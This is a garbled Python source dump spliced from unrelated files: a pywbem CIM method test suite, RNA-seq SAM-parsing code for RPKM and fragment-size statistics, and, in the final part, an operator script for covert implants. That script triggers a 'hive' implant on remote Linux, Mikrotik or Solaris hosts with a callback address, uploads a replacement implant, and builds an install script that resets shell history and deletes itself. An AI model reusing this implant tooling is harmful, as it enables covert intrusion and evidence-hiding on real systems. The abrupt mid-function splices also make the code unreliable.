isRealType = False
if type.startswith('real'):
isRealType = True
if isRealType:
self._dbgPrint('Testing %s invocation with min=%f, max=%f' % (methodName, min, max))
else:
self._dbgPrint('Testing %s invocation with min=%d, max=%d' % (methodName, min, max))
(rv, oparams) = self.conn.InvokeMethod(methodName, 'Test_Method', lo=min, hi=max, nelems=nelems)
if not rv:
self.fail('Invocation of %s returned false success value.' % methodName)
self._dbgPrint('Invocation of %s returned successfully.' % methodName)
if isRealType:
self._dbgPrint('Validating lo (%f) and hi (%f) outparams...' % (min, max))
if abs(oparams['lo'] - min) > real_tolerance:
self.fail('Returned low range value (%f) not equal to specified value (%f).' % (oparams['lo'], min))
if abs(oparams['hi'] - max) > real_tolerance:
self.fail('Returned high range value (%f) not equal to specified value (%f).' % (oparams['hi'], max))
else:
self._dbgPrint('Validating lo (%d) and hi (%d) outparams...' % (min, max))
if oparams['lo'] != min:
self.fail('Returned low range value (%d) not equal to specified value (%d).' % (oparams['lo'], min))
if oparams['hi'] != max:
self.fail('Returned high range value (%d) not equal to specified value (%d).' % (oparams['hi'], max))
self._dbgPrint('Lo and hi outparams validated successfully.')
self._dbgPrint('Validating random list values...')
if oparams['nlist'] is None:
self.fail('Expected a list of values but got none.')
if len(oparams['nlist']) != nelems:
self.fail('Expected a list of %d items but got %d items instead.' % (nelems, len(oparams['nlist'])))
minkey = '%s_min' % type
maxkey = '%s_max' % type
for num in oparams['nlist']:
if num < TestMethods.limits[minkey] or \
num > TestMethods.limits[maxkey]:
if isRealType:
self.fail('List element %f not in expected range for type %s.' % (num, type))
else:
self.fail('List element %d not in expected range for type %s.' % (num, type))
self._dbgPrint('Random list values validated successfully.')
def _run_and_validate_minmedmax(self, type, methodName, numlist):
self._dbgPrint('Testing %s invocation' % methodName)
(rv, oparams) = self.conn.InvokeMethod(methodName, 'Test_Method', numlist=numlist)
if not rv:
self.fail('Invocation of %s returned false success value.' % methodName)
self._dbgPrint('Invocation of %s returned successfully.' % methodName)
self._dbgPrint('Validating min, median, and max outparams...')
if oparams['min'] != 1:
self.fail('Expected min of 1 but instead got %d' % oparams['min'])
if oparams['max'] != 9:
self.fail('Expected max of 9 but instead got %d' % oparams['max'])
if oparams['med'] != 5:
self.fail('Expected median of 5 but instead got %d' % oparams['med'])
self._dbgPrint('Min, median, and max values validated successfully.')
def _run_numeric_type_tests(self, typelist):
gr = self._run_and_validate_getrand
grl = self._run_and_validate_getrandlist
mmm = self._run_and_validate_minmedmax
for type in typelist:
method = 'genRand_%s' % type
minkey = '%s_min' % type
maxkey = '%s_max' % type
min = TestMethods.limits[minkey]
max = TestMethods.limits[maxkey]
gr(type, method, min, max, None, min, max)
gr(type, method, min, min, min)
gr(type, method, max, max, max)
if min != 0:
gr(type, method, TestMethods.zeros[type], TestMethods.zeros[type], TestMethods.zeros[type])
gr(type, method, TestMethods.tens[type], TestMethods.twenties[type], None, TestMethods.tens[type], TestMethods.twenties[type])
# the next two should cause exceptions; getting a TypeError exception is not an error in this case.
try:
gr(type, method, min-1, min-1, min-1)
except TypeError:
pass
try:
gr(type, method, max+1, max+1, max+1)
except TypeError:
pass
method = 'genRandList_%s' % type
nelems = _typed_randrange(TestMethods.tens[type], TestMethods.twenties[type], type)
grl(type, method, min, max, nelems)
grl(type, method, min, max, TestMethods.ones[type])
grl(type, method, min, max, TestMethods.zeros[type])
if min != 0:
grl(type, method, TestMethods.zeros[type], max, nelems)
else:
grl(type, method, min, TestMethods.zeros[type], nelems)
grl(type, method, TestMethods.tens[type], TestMethods.twenties[type], nelems)
grl(type, method, TestMethods.tens[type], TestMethods.twenties[type], TestMethods.ones[type])
grl(type, method, TestMethods.tens[type], TestMethods.twenties[type], TestMethods.zeros[type])
method = 'minmedmax_%s' % type
mmm(type, method, TestMethods.numlists[type])
def test_integer_types(self):
self._run_numeric_type_tests(TestMethods.inttypes)
def test_real_types(self):
self._run_numeric_type_tests(TestMethods.realtypes)
def test_refs(self):
inst = pywbem.CIMInstance('Test_Method', properties={
'id':'one',
'p_str':'One',
'p_sint32':pywbem.Sint32(1)})
self.conn.CreateInstance(inst)
iname = pywbem.CIMInstanceName('Test_Method', namespace='root/cimv2',
keybindings={'id':'one'})
rv, outs = self.conn.InvokeMethod('getStrProp', iname)
self.assertEquals(rv, 'One')
rv, outs = self.conn.InvokeMethod('setStrProp', iname, value='won')
self.assertFalse(outs)
self.assertEquals(rv, 'One')
rv, outs = self.conn.InvokeMethod('getStrProp', iname)
self.assertEquals(rv, 'won')
inst = self.conn.GetInstance(iname)
self.assertEquals(inst['p_str'], 'won')
rv, outs = self.conn.InvokeMethod('getIntProp', iname)
self.assertEquals(rv, 1)
self.assertTrue(isinstance(rv, pywbem.Sint32))
self.assertEquals(inst['p_sint32'], 1)
rv, outs = self.conn.InvokeMethod('setIntProp', iname,
value=pywbem.Sint32(2))
self.assertTrue(isinstance(rv, pywbem.Sint32))
self.assertEquals(rv, 1)
self.assertFalse(outs)
rv, outs = self.conn.InvokeMethod('getIntProp', iname)
self.assertEquals(rv, 2)
self.assertTrue(isinstance(rv, pywbem.Sint32))
inst = self.conn.GetInstance(iname)
self.assertEquals(inst['p_sint32'], 2)
rv, outs = self.conn.InvokeMethod('getObjectPath', 'Test_Method')
self.assertTrue(isinstance(outs['path'], pywbem.CIMInstanceName))
self.assertEquals(outs['path']['id'], 'one')
inst = pywbem.CIMInstance('Test_Method', properties={
'id':'two',
'p_str':'Two',
'p_sint32':pywbem.Sint32(2)})
self.conn.CreateInstance(inst)
rv, outs = self.conn.InvokeMethod('getObjectPaths', 'Test_Method')
self.assertEquals(len(outs['paths']), 2)
self.assertTrue(isinstance(outs['paths'][0], pywbem.CIMInstanceName))
to_delete = outs['paths']
inst = pywbem.CIMInstance('Test_Method', properties={
'id':'three',
'p_str':'Three',
'p_sint32':pywbem.Sint32(3)})
self.conn.CreateInstance(inst)
iname = pywbem.CIMInstanceName('Test_Method', namespace='root/cimv2',
keybindings={'id':'three'})
inames = self.conn.EnumerateInstanceNames('Test_Method')
self.assertEquals(len(inames), 3)
rv, outs = self.conn.InvokeMethod('delObject', 'Test_Method',
path=iname)
inames = self.conn.EnumerateInstanceNames('Test_Method')
self.assertEquals(len(inames), 2)
self.conn.CreateInstance(inst)
''' # OpenWBEM is broken! uncomment this for Pegasus. '''
rv, outs = self.conn.InvokeMethod('delObjects', 'Test_Method',
paths=to_delete)
inames = self.conn.EnumerateInstanceNames('Test_Method')
if chrom not in exon_ranges:
exon_ranges[chrom] = Intersecter()
exon_ranges[chrom].add_interval( Interval( st, end ) )
#read SAM
print >>sys.stderr, "reading "+ self.fileName + '...',
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
flagCode=string.atoi(fields[1])
if (flagCode & 0x0004) != 0: continue #skip unmapped reads
totalReads +=1
if not ParseSAM._uniqueHit_pat.search(line): #skip multiple mapped reads
multiMapReads +=1
continue
chrom = fields[2].upper()
chromStart = string.atoi(fields[3])-1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
#cUR += (len(comb) +1)/2
if(len(comb)>1):
sR+=1
blockStart=[]
blockSize=[]
for i in range(0,len(comb),2):
blockStart.append(chromStart + sum(comb[:i]) )
for i in range(0,len(comb),2):
blockSize.append(comb[i])
#build bitset only for exonic reads
for st,size in zip(blockStart,blockSize):
if (chrom in exon_ranges) and (len(exon_ranges[chrom].find(st,st+size)) >0): #if we found this fragment is overlapped with exon
cUR += 1
mid = int(st) + (size/2)
if chrom not in ranges:
ranges[chrom] = Intersecter()
ranges[chrom].add_interval( Interval( mid, mid ) )
else: #if this fragment is intronic, skip it.
#intronic +=1
continue
self.f.seek(0)
print >>sys.stderr, "Done"
print >>RPKM_OUT, "Total mapped reads (TR): " + str(totalReads)
print >>RPKM_OUT, "Multiple mapped reads (MR): " + str(multiMapReads)
print >>RPKM_OUT, "Uniquely mapped reads (UR): " + str(totalReads - multiMapReads)
print >>RPKM_OUT, "Spliced mapped reads (SR): " + str(sR)
print >>RPKM_OUT, "Corrected uniquely mapped reads (cUR, non-intronic fragments): " + str(cUR)
#print >>RPKM_OUT, "Intronic Fragments (IF): " + str(intronic)
if totalReads ==0:
sys.exit(1)
#read refbed file
print >>sys.stderr, "Assign reads to "+ refbed + '...',
for line in open(refbed,'r'):
try:
if line.startswith('#'):continue
if line.startswith('track'):continue
if line.startswith('browser'):continue
# Parse fields from gene tabls
fields = line.split()
chrom = fields[0].upper()
tx_start = int( fields[1] )
tx_end = int( fields[2] )
geneName = fields[3]
strand = fields[5].replace(" ","_")
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map((lambda x: x + tx_start ), exon_starts)
exon_ends = map( int, fields[10].rstrip( ',\n' ).split( ',' ) )
exon_ends = map((lambda x, y: x + y ), exon_starts, exon_ends)
exon_sizes = map(int,fields[10].rstrip(',\n').split(','))
intron_starts = exon_ends[:-1]
intron_ends=exon_starts[1:]
key='\t'.join((chrom.lower(),str(tx_start),str(tx_end),geneName,'0',strand))
except:
print >>sys.stderr,"[NOTE:input bed must be 12-column] skipped this line: " + line,
continue
# assign reads to intron
mRNA_count=0
mRNA_len=sum(exon_sizes)
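            # RPKM written below = hits * 1e9 / (feature_length_in_bp * cUR): reads per kilobase of feature per million corrected uniquely mapped reads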
if(strand == '-'):
intronNum=len(intron_starts)
exonNum=len(exon_starts)
for st,end in zip(intron_starts,intron_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_intron_" + str(intronNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
intronNum -= 1
for st,end in zip(exon_starts,exon_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_exon_" + str(exonNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
exonNum -= 1
mRNA_count += hits
try:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(mRNA_count) + "\t" + strand + '\t' + str(mRNA_count*1000000000.0/(mRNA_len*cUR)) +'\n')
rpkm[key] = mRNA_count*1000000000.0/(mRNA_len*cUR)
except:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(0) + "\t" + strand + '\t' + str(0) +'\n')
rpkm[key] = 0
elif(strand == '+'):
intronNum=1
exonNum=1
for st,end in zip(intron_starts,intron_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_intron_" + str(intronNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
intronNum += 1
for st,end in zip(exon_starts,exon_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_exon_" + str(exonNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
exonNum += 1
mRNA_count += hits
try:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(mRNA_count) + "\t" + strand + '\t' + str(mRNA_count*1000000000.0/(mRNA_len*cUR)) +'\n')
rpkm[key] = mRNA_count*1000000000.0/(mRNA_len*cUR)
except:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(0) + "\t" + strand + '\t' + str(0) +'\n')
rpkm[key] = 0
print >>sys.stderr, "Done"
        self.f.seek(0)
        return rpkm
def filterKnownReads(self,refbed,outfile=None):
        '''Compare the SAM file with a reference gene model; all reads mapped to the gene model will be filtered
        out. The remaining unknown reads will be written to a new SAM file'''
totalReads=0 #total mapped reads
unknownReads=0
ranges={}
if refbed is None:
print >>sys.stderr,"You must specify a bed file representing gene model\n"
exit(0)
if outfile is None:
out_file = self.fileName + ".unknownReads.SAM"
else:
out_file = outfile + ".unknownReads.SAM"
OUT=open(out_file,'w')
print >>sys.stderr, "Reading reference gene model "+ refbed + '...'
for line in open(refbed,'r'):
try:
if line.startswith(('#','track','browser')):continue
                # Parse fields from gene table
fields = line.split()
chrom = fields[0].upper()
tx_start = int( fields[1] )
tx_end = int( fields[2] )
geneName = fields[3]
strand = fields[5].replace(" ","_")
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map((lambda x: x + tx_start ), exon_starts)
exon_ends = map( int, fields[10].rstrip( ',\n' ).split( ',' ) )
exon_ends = map((lambda x, y: x + y ), exon_starts, exon_ends);
except:
print >>sys.stderr,"[NOTE:input bed must be 12-column] skipped this line: " + line,
continue
for st,end in zip(exon_starts,exon_ends):
if chrom not in ranges:
ranges[chrom] = Intersecter()
ranges[chrom].add_interval( Interval( st, end ) )
print >>sys.stderr, "Processing SAM file "+ self.fileName + '...'
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
flagCode=string.atoi(fields[1])
if (flagCode & 0x0004) != 0: continue #skip unmap reads
if not ParseSAM._uniqueHit_pat.search(line): #skip multiple mapped reads
continue
blockStart=[]
blockSize=[]
totalReads +=1
chrom = fields[2].upper()
chromStart = string.atoi(fields[3])-1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
for i in range(0,len(comb),2):
blockStart.append(chromStart + sum(comb[:i]) )
for i in range(0,len(comb),2):
blockSize.append(comb[i])
for st,size in zip(blockStart,blockSize):
if (chrom in ranges) and (len(ranges[chrom].find(st,st+size)) >0): #if we found this read is overlapped with known gene
break
else:
OUT.write(line)
unknownReads +=1
OUT.close()
print >>sys.stderr, "Total reads mapped to genome: " + str(totalReads)
print >>sys.stderr, "Total reads not overlapped with any exon: " + str(unknownReads)
self.f.seek(0)
def genomicFragSize(self,outfile=None,low_bound=0,up_bound=1000,step=10):
'''estimate the genomic fragment size of mRNA experiment. fragment size = insert_size + 2 x read_length'''
if outfile is None:
out_file1 = self.fileName + ".fragSize.txt"
out_file2 = self.fileName + ".fragSize.Freq.txt"
out_file3 = self.fileName + ".fragSize_plot.r"
else:
out_file1 = outfile + ".fragSize.txt"
out_file2 = outfile + ".fragSize.Freq.txt"
out_file3 = outfile + ".fragSize_plot.r"
FO=open(out_file1,'w')
FQ=open(out_file2,'w')
RS=open(out_file3,'w')
chrom="chr100" #this is the fake chromosome
ranges={}
ranges[chrom]=Intersecter()
window_left_bound = range(low_bound,up_bound,step)
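        # left edges of the fixed-width histogram bins (width = step) used to tally fragment sizes between low_bound and up_bound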
frag_size=0
pair_num=0.0
ultra_low=0.0
ultra_high=0.0
size=[]
counts=[]
count=0
print >>sys.stderr, "Reading SAM file "+ self.fileName + ' ... ',
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
#if fields[0] in pairRead_info:
# continue
flagCode=string.atoi(fields[1])
if (flagCode & 0x0001) ==0:
                print >>sys.stderr,"NOT paired-end sequencing"
sys.exit(1)
if (flagCode & 0x0004) != 0: continue #skip unmap reads
if not ParseSAM._uniqueHit_pat.search(line): #skip multiple mapped reads
continue
if (flagCode & 0x0008 !=0): #skip single-end mapped reads
continue
if (fields[7] =='0'):
continue
            if (int(fields[3]) > int(fields[7])): #only keep the leftmost read of the pair (pos <= mate pos)
continue
pair_num +=1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
read_len = len(fields[9])
if (len(comb)==1): # this read is NOT spliced
frag_size = (int(fields[7]) - int(fields[3]) +1) + read_len
elif (len(comb) >1): # this read is spliced
frag_size = (int(fields[7]) - int(fields[3]) +1) + read_len - sum(comb[1::2])
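                # spliced reads: subtract the skipped intron lengths (odd-index entries of comb, the N runs) from the mate-pair span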
FO.write(fields[0] + '\t' + str(frag_size) + '\n')
if frag_size <= low_bound:
ultra_low+=1
continue
elif frag_size > up_bound:
ultra_high +=1
continue
ranges[chrom].add_interval( Interval( frag_size-1, frag_size ) )
print >>sys.stderr, "Done"
if pair_num==0:
print >>sys.stderr, "Cannot find paired reads"
sys.exit(0)
print >>FQ, "Total paired read " + str(pair_num)
print >>FQ, "<=" + str(low_bound) + "\t"+ str(ultra_low)
for st in window_left_bound:
size.append(str(st + step/2))
count = str(len(ranges[chrom].find(st,st + step)))
counts.append(count)
print >>FQ, str(st) + '\t' + str(st+step) +'\t' + count
print >>FQ, ">" + str(up_bound) + "\t"+ str(ultra_high)
print >>RS, "pdf('gFragSize.pdf')"
print >>RS, "par(mfrow=c(2,1),cex.main=0.8,cex.lab=0.8,cex.axis=0.8,mar=c(4,4,4,1))"
        print >>RS, 'pie(c(%d,%d,%d),col=rainbow(3),cex=0.5,radius=1,main="Total %d fragments",labels=c("fragSize <= %d\\n(%4.2f%%)","fragSize > %d\\n(%4.2f%%)","%d < fragSize <= %d\\n(%4.2f%%)"), density=rep(80,80,80),angle=c(90,140,170))' % (ultra_low, ultra_high, pair_num -ultra_low -ultra_high, pair_num, low_bound, ultra_low*100/pair_num, up_bound, ultra_high*100/pair_num, low_bound, up_bound, 100-ultra_low*100/pair_num - ultra_high*100/pair_num)
print >>RS, 'fragsize=rep(c(' + ','.join(size) + '),' + 'times=c(' + ','.join(counts) + '))'
print >>RS, 'frag_sd = round(sd(fragsize))'
print >>RS, 'frag_mean = round(mean(fragsize))'
print >>RS, 'hist(fragsize,probability=T,breaks=%d,xlab="Fragment size (bp)",main=paste(c("Mean=",frag_mean,";","SD=",frag_sd),collapse=""),border="blue")' % len(window_left_bound)
print >>RS, "lines(density(fragsize,bw=%d),col='red')" % (2*step)
print >>RS ,"dev.off()"
FO.close()
FQ.close()
RS.close()
#self.f.seek(0)
def saturation_RPKM(self,refbed,outfile=None,sample_start=5,sample_step=5,sample_end=100):
        '''for each gene, check if its RPKM (expression level) has already been saturated or not'''
if refbed is None:
print >>sys.stderr,"You must specify a bed file representing gene model\n"
exit(0)
if outfile is None:
rpkm_file = self.fileName + ".eRPKM.xls"
raw_file = self.fileName + ".rawCount.xls"
else:
rpkm_file = outfile + ".eRPKM.xls"
raw_file = outfile + ".rawCount.xls"
RPKM_OUT = open(rpkm_file,'w')
RAW_OUT = open(raw_file ,'w')
ranges={}
totalReads=0
cUR_num = 0 #number
block_list=[] #non-spliced read AS IS, splicing reads were counted multiple times
#read SAM
my_pat = re.compile(r'NH:i:(\d+)\b')
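        # the NH:i:<n> SAM tag gives the number of reported alignments for a read; n > 1 marks a multi-mapped read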
NH_tag=0
print >>sys.stderr, "Reading "+ self.fileName + '...',
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
flagCode=string.atoi(fields[1])
if (flagCode & 0x0004) != 0: continue #skip unmap reads
totalReads +=1
hitNum =[int(i) for i in my_pat.findall(line)]
if len(hitNum) ==0:
                NH_tag=1 #cannot determine uniqueness without NH tag
elif len(hitNum) ==1:
if int(hitNum[0])>1: continue #skip multiple mapped reads
else:
print >>sys.stderr, "More than 1 NH tag found within a single line. Incorrect SAM format!"
sys.exit(1)
chrom = fields[2].upper()
chromStart = string.atoi(fields[3])-1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
cUR_num += (len(comb) +1)/2
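            # (len(comb)+1)/2 is the number of aligned (M) blocks in the CIGAR, i.e. the fragments this read contributes to cUR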
blockStart=[]
blockSize=[]
for i in range(0,len(comb),2):
blockStart.append(chromStart + sum(comb[:i]) )
for i in range(0,len(comb),2):
blockSize.append(comb[i])
for st,size in zip(blockStart,blockSize):
mid = int(st) + (size/2)
block_list.append(chrom + ":" + str(mid))
if NH_tag==1:
print >>sys.stderr, "Warn: NO NH tag found. Cannot determine uniqueness of alignment. All alignments will be used"
print >>sys.stderr, "Done"
print >>sys.stderr, "shuffling alignments ...",
random.shuffle(block_list)
print >>sys.stderr, "Done"
ranges={}
sample_size=0
frag_total = cUR_num
RPKM_table=collections.defaultdict(list)
rawCount_table=collections.defaultdict(list)
RPKM_head=['chr','start','end','name','score','strand']
tmp=range(sample_start,sample_end,sample_step)
tmp.append(100)
#=========================sampling uniquely mapped reads from population
for pertl in tmp: #[5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95,100]
index_st = int(frag_total * (pertl-sample_step)/100.0)
index_end = int(frag_total * pertl/100.0)
0))
installationFile.write(self.get('Payload', 'tempPayload', 0))
installationFile.write(" 2>/dev/null\n")
installationFile.write('\n')
installationFile.write("#Reset History.\n")
installationFile.write("HISTSIZE=$OLDHISTSIZE\n")
installationFile.write("export HISTSIZE\n")
installationFile.write("set HISTFILE $OLDHISTFILE\n")
installationFile.write("export HISTFILE\n")
installationFile.write('\n')
installationFile.write('#Remove the installation script...\n')
installationFile.write('rm -f $fileToDelete 2>/dev/null\n')
installationFile.close()
#================================================================
def makeInstallationScript(self):
'''
        Depending on the operatingSystem of the remote targeted box, creates the installation
        script by calling one of the following:
self.make_Linux_hiveUpdateInstallationScript()
self.make_MT_hiveUpdateInstallationScript()
self.make_Solaris_hiveUpdateInstallationScript()
'''
#Delete the installFile if it exists now for convenience and recreate it...
if os.path.isfile(self.get('Payload', 'installation_Script_Name',0)):
os.remove(self.get('Payload', 'installation_Script_Name',0))
OS = self.get('Remote', 'operatingSystem', 0)
#Linux
if OS == "Linux":
self.make_Linux_hiveUpdateInstallationScript()
#Mikrotik
elif OS == "Mikrotik PPC":
self.make_MT_hiveUpdateInstallationScript()
elif OS == "Mikrotik x86":
self.make_MT_hiveUpdateInstallationScript()
elif OS == "Mikrotik MIPS LE":
self.make_MT_hiveUpdateInstallationScript()
elif OS == "Mikrotik MIPS BE":
self.make_MT_hiveUpdateInstallationScript()
#Solaris
elif OS == "Solaris Sparc":
print "\n\n\n Making Solaris Script\n\n\n"
self.make_Solaris_hiveUpdateInstallationScript()
elif OS == "Solaris x86":
self.make_Solaris_hiveUpdateInstallationScript()
else:
print "\n\n This only works for MT, Linux, or Solaris systems at this time.\n\n"
#================================================================
def runHiveOperation(self):
'''
If the configuration File operation is set to 'hiveUpdate' it runs the runSingleUpdateOperation function.
If the configuration File operation is set to 'hiveResetTimer', it will execute the runSingleResetOperation.
'''
print "\n\n runHiveOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
if self.get('Payload', 'operation', 0) == 'hiveUpdate':
self.runSingleUpdateOperation()
elif self.get('Payload', 'operation', 0) == 'hiveResetTimer':
self.runSingleResetOperation()
else:
print "\n\n runHiveOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " No Valid Operations Found."
#================================================================
def runHiveConnectOperation(self):
'''
        Uses pexpect to connect to the target hive machine while maintaining a log file
        called cutthroat_hiveOperation_yyyymmdd_HHMMSS.log
'''
# Pexpect starts cutthroat
#
# ./cutthroat ./hive
#
#
#Starts cutthroat and displays the initial startup
commandLine="./cutthroat ./hive"
print "Trying to spawn "+commandLine
cutT = pexpect.spawn(commandLine)
if self.logfileName == "None":
now=datetime.now()
self.logfileName="cutthroat_hiveOperation_"+now.strftime('%Y%m%d_%H%M%S.')+"log"
print "\n\nSetting Log File to %s\n\n" % (self.logfileName)
fout = file(self.logfileName, 'w')
else:
fout = file(self.logfileName, 'a')
cutT.logfile=fout
#Save cutT for use in other operations...
self.cutT = cutT
#Always set connectionStatus to false at the beginning of this function.
#Only this function will set the connectionStatus except for init...
self.connectionStatus = False;
print "\n\n runHiveConnectOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
hiveTimeout = self.get('Remote','hiveTimeout',0)
index = cutT.expect( ['> ', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
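        # pexpect's expect() returns the index of whichever pattern matched first: 0 = cutthroat prompt, 1 = EOF, 2 = timeout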
if index == 0:
print "Matched first index of \>"
print cutT.before
print cutT.after
elif index == 1:
print "FAILED MATCH: Desired match did not occur..."
print cutT.before
print cutT.after
elif index == 2:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
#pattern="['> ', pexpect.EOF, pexpect.TIMEOUT]"
#cut_3_interface( cutT, pattern, 20)
if validIP( self.get('Remote', 'remoteIP', 0) ):
pass
else:
print "\n\n\n\n\n runHiveConnectOperation: RemoteIP must be set...\n\n\n\n\n\n"
sys.exit()
#We will delete any previously built files for this remoteIP for convenience
if os.path.isfile(self.get('Remote', 'remoteIP', 0)):
os.remove(self.get('Remote', 'remoteIP', 0))
print "Starting connect sequence."
#
#
# ilm connect ${remoteIP}
#
#
#connection='ilm connect 10.2.9.6'
connection='ilm connect '+self.get('Remote', 'remoteIP', 0) +''
cutT.sendline(connection)
#This section assumes the remoteIP file does not exist so it prompts the user for input...
index = cutT.expect( ['\? ', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print cutT.before
elif index == 1:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 2:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
#cutT.sendline(' 10.3.2.19') #callback address
cutT.sendline(' '+self.get('Local', 'localIP', 0)) #callback address
patternA="\?"
cut_3_interface( cutT, patternA, 20, "callbackIPsent")
cutT.sendline(' '+self.get('Local', 'localPort', 0)) #callback port
cut_3_interface( cutT, patternA, 20, "callbackPortsent")
#cutT.sendline(" 10.2.9.6") #remote IP Address
cutT.sendline(' '+self.get('Remote', 'remoteIP', 0)) #remote IP Address
cut_3_interface( cutT, patternA, 20, "remoteIPsent")
#cutT.sendline(" dns-request")
cutT.sendline(' '+self.get('Remote', 'triggerProtocol', 0))
if (self.get('Remote', 'triggerProtocol', 0) == "raw-udp") or (self.get('Remote', 'triggerProtocol', 0) == "raw-tcp"):
cut_3_interface( cutT, patternA, 15, "rawTriggersent")
cutT.sendline(' '+str(self.get('Remote', 'remotePort', 0)))
#
#
# Sends the trigger...
#
#
index = cutT.expect( [' Trigger sent.', '> ', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print cutT.before
print cutT.after
now=datetime.now()
print " Sent on "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
            print "Matched >, raw-tcp port on remote host could not be reached..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
print "\n\n Waiting... \n\n"
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=int(hiveTimeout) )
if index == 0:
print "Received response."
print "\n\nself.connectionStatus being set to True...\n\n"
self.connectionStatus = True;
print cutT.before
print cutT.after
elif index == 1:
print "Failure occurred"
self.connectionStatus = False;
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
self.connectionStatus = False;
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (int(hiveTimeout))
now=datetime.now()
print " Trigger Timed out on "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
self.connectionStatus = False;
print cutT.before
print cutT.after
print "\n\nFAILED INITIAL TRIGGER RESPONSE from "+self.get('Remote', 'remoteIP', 0)+".\n\n"
print "\n\n runHiveConnectOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now ending..."
#================================================================
def runSingleUpdateOperation(self):
'''
        Uses pexpect to upload the new implant and installScript and make them executable, while
        maintaining a log file called cutthroat_hiveOperation_yyyymmdd_HHMMSS.log
'''
#Create Installation File
self.makeInstallationScript()
#Establishes initial connection to hive server
self.runHiveConnectOperation()
#runHiveConnectOperation establishes cutT...
cutT = self.cutT
if self.connectionStatus == True:
print "\n\n runSingleUpdateOperation: " + self.get('Payload', 'operation', 0) + " for " + self.get('Remote', 'remoteIP', 0 ) + " now starting..."
# Pexpect starts cutthroat
#
# ./cutthroat ./hive
#
#
#Starts cutthroat and displays the initial startup
#fileName=logFile
#fout = file(fileName, 'w')
#cutT.logfile=fout
ctCommand= " file put "+self.get('Payload', 'newPayload', 0)+" "+self.get('Remote', 'installationDirectory', 0) + self.get('Payload', 'tempPayload', 0)
cutT.sendline(ctCommand)
#
#
# Sends the updated hive...
#
#
response="\["+self.get('Remote', 'remoteIP', 0)+"\]> "
index = cutT.expect( [response, 'Failure', pexpect.EOF, pexpect.TIMEOUT] , timeout=self.defaultTimeout )
if index == 0:
print "Received response."
print cutT.before
print cutT.after
now=datetime.now()
print " Updated hive sent as newhive on "+now.strftime('%m/%d/%Y at %H:%M:%S')+" hrs"
elif index == 1:
print "Failed..."
print cutT.before
print cutT.after
elif index == 2:
print "EOF occurred"
print cutT.before
print cutT.after
elif index == 3:
print "Timeout of %d occurred." % (self.defaultTimeout)
print cutT.before
print cutT.after
# This line is specific to mikrotik routers for now...
#cutT.sendline(" cmd exec \"chmod 755 /rw/pckg/newhive\"")
